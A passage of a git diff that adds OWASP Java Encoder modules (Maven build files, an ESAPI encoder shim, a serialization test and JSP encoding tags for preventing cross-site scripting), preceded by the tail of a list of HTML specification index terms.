button +submit buttons +submit() +submittable +submittable elements +submitted +submitting +subscribe +subtitle +subtitles +suffer from a step\n mismatch +suffer from a step mismatch +suffering from a\n type mismatch +suffering from a custom\n error +suffering from a custom error +suffering from a pattern mismatch +suffering from a step mismatch +suffering from a type mismatch +suffering from an\n overflow +suffering from an\n underflow +suffering from an overflow +suffering from an underflow +suffering from being\n missing +suffering from being missing +suffering from being too long +suggestions\n source element +suggestions source\n element +suggestions source element +summary +sup +support the scripting\n language +supported\n property names +supported property\n indices +supported property indices +supported property names +supporting the suggested\n default rendering +suspend +svg +swapCache +swapCache() +synchronous\n section +synchronous\n section +synchronous\n sections +synchronous\n section +synchronous section +synchronous sections +syntax for which +tBodies +tFoot +tHead +tabIndex +tabindex +table +table\n model +table layout techniques +table model +table model\n errors +table model error +tables +tag +tag\n name state +tag cloud +tag name +tag name\n state +tag open state +tags +target +target element +task +task\n queue +task\n queue +task\n queues +task\n queues +task\n source +task\n queue +task queue +task queues +task source +task sources +tasks +tbody +td +techniques for describing\n tables +tel +temporary\n buffer +temporary buffer +term +text +text\n track cue writing direction +text\n track +text\n track cue writing direction +text\n track +text\n nodes +text\n track +text\n track cue active flag +text\n track kind +text\n tracks +text\n node +text\n track +text\n track cue size +text\n track cue writing direction +text\n track mode +text\n tracks +text field +text node +text nodes +text track +text track\n cue +text track\n mode +text track\n cue order +text track\n cues +text track\n cue +text track\n cue display state +text track\n cue start time +text track\n kind +text track\n label +text track\n mode +text track\n cue +text track\n cues +text track\n mode +text track\n readiness state +text track cue +text track cue\n display state +text track cue\n pause-on-exit flag +text track cue\n active flag +text track cue\n end time +text track cue\n identifier +text track cue\n pause-on-exit flag +text track cue\n size +text track cue\n start time +text track cue\n text +text track cue\n writing direction +text track cue\n identifier +text track cue\n order +text track cue\n pause-on-exit flag +text track cue\n size +text track cue\n text +text track cue active\n flag +text track cue active\n flag +text track cue active flag +text track cue display state +text track cue end\n time +text track cue end\n time +text track cue end time +text track cue identifier +text track cue order +text track cue pause-on-exit\n flag +text track cue pause-on-exit\n flag +text track cue pause-on-exit flag +text track cue size +text track cue start\n time +text track cue start\n time +text track cue start time +text track cue text +text track cue writing\n direction +text track cue writing direction +text track cues +text track disabled +text track failed to load +text track hidden +text track kind +text track label +text track language +text track list of cues +text track loaded +text track loading +text track mode +text track not loaded +text track readiness\n state +text track readiness\n state +text track readiness state +text track showing +text tracks +text-level semantics\n usage summary +text/cache-manifest +text/html +text/plain +textContent +textLength +textPosition +textTracks +textTracks[ +textarea +textarea effective height +textarea effective width +tfoot +th +that algorithm +the\n resource's Content-Type metadata +the\n script block's type +the\n script block's type +the\n resource's Content-Type metadata +the\n directionality +the\n document's address +the\n title element +the\n address +the\n directionality +the\n document's current address +the\n script block's type +the\n title element +the\n conditions described above +the\n incumbent body element +the\n html element +the\n HTML syntax +the\n active formatting elements are reconstructed +the\n body element +the\n directionality +the\n document's address +the\n document's current address +the\n drag data item kind +the\n link is an alternative stylesheet +the\n rules for choosing a browsing context given a browsing context\n name +the\n script settings determined from the node +the Document's address +the applet\n element +the embed element +the head\n element +the head element +the html element +the object element +the title\n element +the title element +the origin it was\n assigned when its browsing context was created +the HTML\n syntax +the HTML syntax +the URL given by this\n link +the W3C CVS server +the XHTML\n syntax +the XHTML\n syntax +the XHTML syntax +the attributes common to all media\n elements +the body\n element +the body\n element +the body\n element +the body element +the current address +the directionality +the document's\n address +the document's\n current address +the document's\n address +the document's address +the document's current\n address +the document's current address +the document's domain +the drag data\n item type string +the drag data item\n kind +the drag data item\n kind +the drag data item\n kind +the drag data item kind +the drag data item type\n string +the drag data item type string +the encoding of the\n document itself +the event handler processing algorithm +the example in the File\n Upload state section +the handling for misnested tags +the indicated part of the\n document +the indicated part of the\n document +the indicated part of the document +the link is an\n alternative stylesheet +the location bar BarProp\n object +the manifest +the menu bar BarProp\n object +the next step +the personal bar BarProp\n object +the rendering section +the requirements given in the prose +the resource's Content-Type\n metadata +the resource's Content-Type\n metadata +the rules\n described previously +the rules for choosing a\n browsing context given a browsing context name +the rules for choosing a browsing context given a\n browsing context name +the rules for choosing a browsing context given a browsing\n context name +the script\n block's type +the script\n settings determined from the node +the script block's\n character encoding +the script block's\n type +the script block's\n type +the script block's character encoding +the script block's fallback character\n encoding +the script block's fallback character\n encoding +the script block's source +the script block's type +the scrollbar BarProp\n object +the section on\n footnotes +the section the linking element is most\n closely associated with +the sniffed type of the resource +the stack +the status bar BarProp\n object +the step labeled\n "fragment identifiers" +the text tracks are ready +the toolbar BarProp\n object +thead +their document's current\n address +this +this is\n a reference, not a copy +this is a reference, not a copy +through which +time +time-zone\n offset +time-zone offset +timeline\n offset +timeline offset +timeupdate +title +toBlob +toDataURL +toDataURL() +toggle +tokenization +tokenizer +tooLong +toolbar +top +top-level\n browsing context +top-level\n browsing context +top-level\n browsing context +top-level browsing\n context +top-level browsing\n context +top-level browsing\n context +top-level browsing\n context +top-level browsing\n contexts +top-level browsing context +top-level browsing contexts +tr +track +track\n URL +track\n label +track URL +track label +track language +trademark +transparent +transparently follow the redirect +traverse the\n history by a delta +traverse the history by\n a delta +traverse the history by a\n delta +traverse the history by a delta +traversing the\n history +tree\n order +tree\n order +tree\n construction +tree\n order +tree construction +tree order +true-by-default +trueSpeed +truespeed +trusted +tt +turn off +turned off +turned on +type +type\n sniffing rules +type blacklist +type information +type string +typeMismatch +typeMustMatch +typemustmatch +types +u +ul +unavailable +undo transaction history +unfocusing\n steps +unfocusing steps +unique\n identifier +unique identifier +unique identifier (ID) +unit\n of related similar-origin browsing contexts +unit of\n related similar-origin browsing contexts +unit of related browsing\n contexts +unit of related browsing contexts +unit of related similar-origin browsing\n contexts +unit of related similar-origin browsing contexts +unload a\n document +unload a document +unloading document cleanup steps +unordered\n set of unique space-separated tokens +unordered set of unique\n space-separated tokens +unordered set of unique space-separated tokens +unquoted +unregisterContentHandler +unregisterProtocolHandler +up +update +update\n status +update status +update the\n image data +update the\n session history with the new page +update the image data +update the session\n history with the new page +update the session history with\n the new page +update the session history with the new\n page +update the session history with the new page +updated the image\n data +updateready +updating the session history with\n the new page +upgrade\n attempt +upgrade\n attempt +upgrade attempt +use the plugin that supports resource type +use-credentials +useMap +used during the parsing +usemap +user\n interaction task source +user interaction +user interaction task\n source +user interaction task\n source +user interaction task source +userAgent +using the\n rules for +using the rules for +vAlign +vCard MIME Directory\n Profile +vLink +valid +valid\n URL +valid\n integer +valid\n MIME type +valid\n date string +valid\n date string in content with optional time +valid\n floating point number +valid\n floating point numbers +valid\n forced-UTC global date and time string +valid\n global date and time string +valid\n integer +valid\n local date and time string +valid\n media query +valid\n month string +valid\n non-empty URL potentially surrounded by spaces +valid\n non-negative integers +valid\n simple color +valid\n time string +valid\n week string +valid MIME\n type +valid MIME type +valid MIME type with no parameters +valid MIME types with no parameters +valid URL +valid URL\n potentially surrounded by spaces +valid URL potentially\n surrounded by spaces +valid URL potentially surrounded by\n spaces +valid browsing\n context name or keyword +valid browsing\n context names or keywords +valid browsing context\n name +valid browsing context\n name or keyword +valid browsing context name +valid browsing context name\n or keyword +valid date\n string +valid date or\n time string +valid date or time string +valid date or time string in content +valid date string +valid date string with\n optional time +valid date string with optional\n time +valid e-mail address +valid e-mail address\n list +valid e-mail address list +valid floating\n point number +valid floating point\n number +valid floating point\n numbers +valid floating point number +valid floating point numbers +valid forced-UTC\n global date and time string +valid forced-UTC global date and time\n string +valid global\n date and time string +valid global date and\n time strings +valid global date and\n time string +valid global date and time\n string +valid global date and time string +valid hash-name reference +valid integer +valid integers +valid list of\n integers +valid local date and\n time string +valid local date and time\n string +valid local date and time string +valid lowercase simple color +valid media query +valid month\n string +valid month string +valid non-empty\n URL potentially surrounded by spaces +valid non-empty URL +valid non-empty URL potentially\n surrounded by spaces +valid non-empty URL potentially surrounded by\n spaces +valid non-negative\n integer +valid non-negative\n integers +valid non-negative integer +valid simple color +valid time\n string +valid time string +valid week\n string +valid week string +validationMessage +validity +validity states +valign +value +value\n sanitization algorithm +value mode\n flag +value mode flag +value sanitization\n algorithm +value sanitization\n algorithm +value sanitization algorithm +values +valueAsDate +valueAsDate +valueAsNumber +valueMissing +valueType +values +values are\n reset +valuetype +var +various W3C HTML WG\n lists +various WHATWG lists +version +vertical\n growing right +vertical growing\n left +vertical growing\n right +vertical growing\n left +vertical growing left +vertical growing right +video +videoHeight +videoTracks +videoWidth +violation +visible +vlink +vlinkColor +void elements +volume +volumechange +vspace +waiting +wbr +web developer edition +week +week number of\n the last day +week number of the last day +whatwg@whatwg.org +when the metadata of the clip becomes\n known +whitelisted scheme +whitespace +whitespace trimming +width +width of the\n select's labels +will +will\n not +will be fired +will cause +willValidate +willful\n violation +willful violation +window +window.alert() +window.applicationCache +window.close() +window.open() +wrap +write +writeln +writing direction +xml:base +xml:lang +xmp +yet more restrictions +yieldForStorageUpdates diff --git a/esapi/pom.xml b/esapi/pom.xml new file mode 100644 index 0000000..531afbb --- /dev/null +++ b/esapi/pom.xml @@ -0,0 +1,224 @@ + + + + + + 4.0.0 + + + org.owasp.encoder + encoder-parent + 1.2-SNAPSHOT + + + encoder-esapi + 1.2-SNAPSHOT + jar + + OWASP Encoders ESAPI Thunk + + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. + + + + + + org.apache.maven.plugins + maven-surefire-plugin + 2.12 + + + + org.codehaus.mojo + cobertura-maven-plugin + 2.5.2 + + + 85 + 85 + false + 85 + 85 + 85 + 85 + + + + + + clean + + + + + + org.apache.maven.plugins + maven-site-plugin + 3.2 + + + + org.apache.maven.plugins + maven-project-info-reports-plugin + 2.6 + + + + index + summary + license + scm + mailing-list + issue-tracking + dependencies + plugin-management + project-team + + + + + + org.codehaus.mojo + versions-maven-plugin + 1.3.1 + + + + dependency-updates-report + plugin-updates-report + + + + + + org.apache.maven.plugins + maven-jxr-plugin + 2.3 + + + org.apache.maven.plugins + maven-surefire-report-plugin + 2.12.4 + + + + report-only + failsafe-report-only + + + + + + org.codehaus.mojo + cobertura-maven-plugin + 2.5.1 + + + org.apache.maven.plugins + maven-pmd-plugin + 2.7.1 + + 1.5 + true + utf-8 + + + + org.apache.maven.plugins + maven-javadoc-plugin + 2.9 + + + default + + javadoc + + + + + + org.apache.maven.plugins + maven-checkstyle-plugin + 2.9.1 + + ../checkstyle.xml + basedir=${basedir}/.. + + + + org.codehaus.mojo + findbugs-maven-plugin + 2.5.2 + + + + + + + + + + org.owasp.encoder + encoder + 1.2-SNAPSHOT + + + org.owasp.esapi + esapi + [2.0,3) + + + junit + junit + 3.8.1 + test + + + + + + sign-artifacts + + + performRelease + true + + + + + + org.apache.maven.plugins + maven-gpg-plugin + + + sign-artifacts + verify + + sign + + + + + + + + + diff --git a/esapi/src/main/java/org/owasp/encoder/esapi/ESAPIEncoder.java b/esapi/src/main/java/org/owasp/encoder/esapi/ESAPIEncoder.java new file mode 100644 index 0000000..0f00de0 --- /dev/null +++ b/esapi/src/main/java/org/owasp/encoder/esapi/ESAPIEncoder.java @@ -0,0 +1,240 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.esapi; + +import java.io.IOException; +import org.owasp.encoder.Encode; +import org.owasp.esapi.Encoder; +import org.owasp.esapi.codecs.Codec; +import org.owasp.esapi.errors.EncodingException; +import org.owasp.esapi.reference.DefaultEncoder; + +/** + * ESAPIEncoder is a singleton implementation of the ESAPI Encoder API. It + * is meant to allow quick and easy drop-in replacement of the default + * encoder included with the ESAPI library, as the Encoder libraries are + * faster and use less memory thus cause fewer garbage collections. + * + *

    Please note that the OWASP Java Encoders does not implement all + * the encodings of the ESAPI Encoder API. In such situations this + * implementation will fallback onto the default reference implementation + * included with ESAPI. Thus you should see the performance benefit from + * the methods included in the Encoder, but still maintain compatibility + * with all methods from ESAPI Encoder.

    + * + *

    For clarity, the reason the OWASP Java Encoders do not include some + * of the ESAPI library is that the Encoders library is specifically focused + * on encoding, and thus does not include:

    + * + *
      + *
    • Input validation/normalization methods: + * {@link org.owasp.esapi.Encoder#canonicalize(String)}, + * {@link org.owasp.esapi.Encoder#canonicalize(String, boolean)}, + * {@link org.owasp.esapi.Encoder#canonicalize(String, boolean, boolean)}
      • + * + *
    • Decoding methods: + * {@link org.owasp.esapi.Encoder#decodeForHTML(String)}, + * {@link org.owasp.esapi.Encoder#decodeFromURL(String)}
      • + * + *
    • Binary-to-text/text-to-binary: + * {@link org.owasp.esapi.Encoder#encodeForBase64(byte[], boolean)}, + * {@link org.owasp.esapi.Encoder#decodeFromBase64(String)}.
      • + * + *
    • Bind-able APIs (such as {@link java.sql.PreparedStatement}: + * {@link org.owasp.esapi.Encoder#encodeForSQL(org.owasp.esapi.codecs.Codec, String)}, + * {@link org.owasp.esapi.Encoder#encodeForXPath(String)}, + * {@link org.owasp.esapi.Encoder#encodeForOS(org.owasp.esapi.codecs.Codec, String)}
      • + * + *
    • Rarely-used or alternate compatible encoding: + * {@link org.owasp.esapi.Encoder#encodeForVBScript(String)}, + * {@link org.owasp.esapi.Encoder#encodeForLDAP(String)}, + * {@link org.owasp.esapi.Encoder#encodeForDN(String)}
      • + *
    + * + *

    (Please note that with sufficient feedback from the user base, the above + * mentioned methods may be implemented in future releases of the OWASP + * Java Encoders, if/when that happens, this shim class will be updated to + * call out to the new methods.)

    + * + *

    You may notice that this class does not actually implement Encoder + * itself. Instead it simply provides a {@link #getInstance()} method that + * does. This allows the implementation details maximum flexibility by not + * creating a any public API that would restrict changes later

    + * + * @author jeffi + */ +public final class ESAPIEncoder { + + /** No instances. */ + private ESAPIEncoder() {} + + /** + * Returns an instance of the Encoder. This method is the only supported + * mechanism by which an ESAPIEncoder instance should be obtained. The + * returned implementation is guaranteed to be thread-safe for the methods + * that the OWASP Java Encoders implement (see class documentation). + * Though not a requirement of the ESAPI Encoder API, the returned value + * is also serializable. + * + * @return An encoder implementation that uses the OWASP Java Encoders + * for most of the common encoding methods. + */ + public static Encoder getInstance() { + return Impl.INSTANCE; + } + + /** + * This is the private singleton that implements the ESAPI Encoder shim. + * It is implemented as a single-value enum to get all the "free" singleton + * properties associated with enums--such as serialization, and on-demand + * initialization. + * + *

    The implementation is intentionally private to avoid any API baggage. + * The instance should be obtained using + * {@link org.owasp.encoder.esapi.ESAPIEncoder#getInstance()}.

    + */ + private enum Impl implements Encoder { + /** + * The singleton instance. + */ + INSTANCE; + + /** + * The reference encoder from ESAPI. Any ESAPI method without an + * OWASP Java Encoder equivalent is delegated to this instance. + */ + private final Encoder _referenceEncoder = DefaultEncoder.getInstance(); + + /** {@inheritDoc} */ + public String canonicalize(String s) { + return _referenceEncoder.canonicalize(s); + } + + /** {@inheritDoc} */ + public String canonicalize(String s, boolean strict) { + return _referenceEncoder.canonicalize(s, strict); + } + + /** {@inheritDoc} */ + public String canonicalize(String s, boolean restrictMultiple, boolean restrictMixed) { + return _referenceEncoder.canonicalize(s, restrictMultiple, restrictMixed); + } + + /** {@inheritDoc} */ + public String encodeForCSS(String s) { + return Encode.forCssString(s); + } + + /** {@inheritDoc} */ + public String encodeForHTML(String s) { + return Encode.forHtml(s); + } + + /** {@inheritDoc} */ + public String decodeForHTML(String s) { + return _referenceEncoder.decodeForHTML(s); + } + + /** {@inheritDoc} */ + public String encodeForHTMLAttribute(String s) { + return Encode.forHtmlAttribute(s); + } + + /** {@inheritDoc} */ + public String encodeForJavaScript(String s) { + return Encode.forJavaScript(s); + } + + /** {@inheritDoc} */ + public String encodeForVBScript(String s) { + return _referenceEncoder.encodeForVBScript(s); + } + + /** {@inheritDoc} */ + public String encodeForSQL(Codec codec, String s) { + return _referenceEncoder.encodeForSQL(codec, s); + } + + /** {@inheritDoc} */ + public String encodeForOS(Codec codec, String s) { + return _referenceEncoder.encodeForOS(codec, s); + } + + /** {@inheritDoc} */ + public String encodeForLDAP(String s) { + return _referenceEncoder.encodeForLDAP(s); + } + + /** {@inheritDoc} */ + public String encodeForDN(String s) { + return _referenceEncoder.encodeForDN(s); + } + + /** {@inheritDoc} */ + public String encodeForXPath(String s) { + return _referenceEncoder.encodeForXPath(s); + } + + /** {@inheritDoc} */ + public String encodeForXML(String s) { + return Encode.forXml(s); + } + + /** {@inheritDoc} */ + public String encodeForXMLAttribute(String s) { + return Encode.forXmlAttribute(s); + } + + /** {@inheritDoc} */ + public String encodeForURL(String s) throws EncodingException { + return Encode.forUri(s); + } + + /** {@inheritDoc} */ + public String decodeFromURL(String s) throws EncodingException { + return _referenceEncoder.decodeFromURL(s); + } + + /** {@inheritDoc} */ + public String encodeForBase64(byte[] bytes, boolean wrap) { + return _referenceEncoder.encodeForBase64(bytes, wrap); + } + + /** {@inheritDoc} */ + public byte[] decodeFromBase64(String s) throws IOException { + return _referenceEncoder.decodeFromBase64(s); + } + } +} diff --git a/esapi/src/test/java/org/owasp/encoder/esapi/ESAPIEncoderTest.java b/esapi/src/test/java/org/owasp/encoder/esapi/ESAPIEncoderTest.java new file mode 100644 index 0000000..7443996 --- /dev/null +++ b/esapi/src/test/java/org/owasp/encoder/esapi/ESAPIEncoderTest.java @@ -0,0 +1,49 @@ +package org.owasp.encoder.esapi; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import junit.framework.Test; +import junit.framework.TestCase; +import junit.framework.TestSuite; +import org.owasp.esapi.ESAPI; +import org.owasp.esapi.Encoder; + +/** + * ESAPIEncoderTest + * + * @author jeffi + */ +public class ESAPIEncoderTest extends TestCase { + public static Test suite() { + return new TestSuite(ESAPIEncoderTest.class); + } + + public void testEncode() throws Exception { + // Note: ESAPI reference encodes as: "<>&Ω" + // That's 25 characters to OWASP Java Encoder's 14. + assertEquals("<>&\u03a9", ESAPI.encoder().encodeForXML("<>&\u03a9")); + } + + public void testSerialization() throws Exception { + // Note: ESAPI reference implementation is NOT serializable. Maybe + // it will be in the future. Our implementation is however + // guaranteed serializable. + + Encoder encoder = ESAPI.encoder(); + + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + + ObjectOutputStream oos = new ObjectOutputStream(baos); + oos.writeObject(encoder); + oos.close(); + + ObjectInputStream ois = new ObjectInputStream( + new ByteArrayInputStream(baos.toByteArray())); + + Encoder deserializedEncoder = (Encoder)ois.readObject(); + + assertSame(encoder, deserializedEncoder); + } +} diff --git a/esapi/src/test/resources/.esapi/ESAPI.properties b/esapi/src/test/resources/.esapi/ESAPI.properties new file mode 100644 index 0000000..bdffd2a --- /dev/null +++ b/esapi/src/test/resources/.esapi/ESAPI.properties @@ -0,0 +1 @@ +ESAPI.Encoder=org.owasp.encoder.esapi.ESAPIEncoder \ No newline at end of file diff --git a/jsp/pom.xml b/jsp/pom.xml new file mode 100644 index 0000000..5d53304 --- /dev/null +++ b/jsp/pom.xml @@ -0,0 +1,243 @@ + + + + + + 4.0.0 + + + org.owasp.encoder + encoder-parent + 1.2-SNAPSHOT + + + encoder-jsp + 1.2-SNAPSHOT + jar + + OWASP Encoders JSP tags and EL functions + + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. + + + + + + org.apache.maven.plugins + maven-surefire-plugin + 2.12 + + + + org.codehaus.mojo + cobertura-maven-plugin + 2.5.2 + + + 85 + 85 + false + 85 + 85 + 85 + 85 + + + + + + clean + + + + + + org.apache.maven.plugins + maven-site-plugin + 3.2 + + + + org.apache.maven.plugins + maven-project-info-reports-plugin + 2.6 + + + + index + summary + license + scm + mailing-list + issue-tracking + dependencies + plugin-management + project-team + + + + + + org.codehaus.mojo + versions-maven-plugin + 1.3.1 + + + + dependency-updates-report + plugin-updates-report + + + + + + org.apache.maven.plugins + maven-jxr-plugin + 2.3 + + + org.apache.maven.plugins + maven-surefire-report-plugin + 2.12.4 + + + + report-only + failsafe-report-only + + + + + + org.codehaus.mojo + cobertura-maven-plugin + 2.5.1 + + + org.apache.maven.plugins + maven-pmd-plugin + 2.7.1 + + 1.5 + true + utf-8 + + + + org.apache.maven.plugins + maven-javadoc-plugin + 2.9 + + + default + + javadoc + + + + + + org.apache.maven.plugins + maven-checkstyle-plugin + 2.9.1 + + ../checkstyle.xml + basedir=${basedir}/.. + + + + org.codehaus.mojo + findbugs-maven-plugin + 2.5.2 + + + + + + + + + + org.owasp.encoder + encoder + 1.2-SNAPSHOT + + + junit + junit + 3.8.1 + test + + + javax.servlet.jsp + javax.servlet.jsp-api + 2.2.1 + true + + + javax.servlet + javax.servlet-api + 3.0.1 + test + + + org.springframework + spring-test + 3.1.3.RELEASE + test + + + org.springframework + spring-core + 3.1.3.RELEASE + test + + + + + + sign-artifacts + + + performRelease + true + + + + + + org.apache.maven.plugins + maven-gpg-plugin + + + sign-artifacts + verify + + sign + + + + + + + + + diff --git a/jsp/src/main/java/org/owasp/encoder/tag/EncodingTag.java b/jsp/src/main/java/org/owasp/encoder/tag/EncodingTag.java new file mode 100644 index 0000000..369b001 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/EncodingTag.java @@ -0,0 +1,57 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import javax.servlet.jsp.tagext.SimpleTagSupport; + +/** + * The base class for the encoding tags within tihs package. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public abstract class EncodingTag extends SimpleTagSupport { + /** + * The value to be written out by the tag. + */ + protected String _value; + /** + * Sets the value to be written out by the tag. + * @param value the value to be written out by the tag. + */ + public void setValue(String value) { + this._value = value; + } + +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForCDATATag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForCDATATag.java new file mode 100644 index 0000000..23db285 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForCDATATag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform encoding sufficient to place into a CDATA block. + * This wraps the {@link org.owasp.encoder.Encode#forCDATA(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForCDATATag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forCDATA(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForCssStringTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForCssStringTag.java new file mode 100644 index 0000000..e6edb5e --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForCssStringTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform CSS encoding for CSS strings. + * This wraps the {@link org.owasp.encoder.Encode#forCssString(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForCssStringTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forCssString(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForCssUrlTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForCssUrlTag.java new file mode 100644 index 0000000..673a975 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForCssUrlTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted 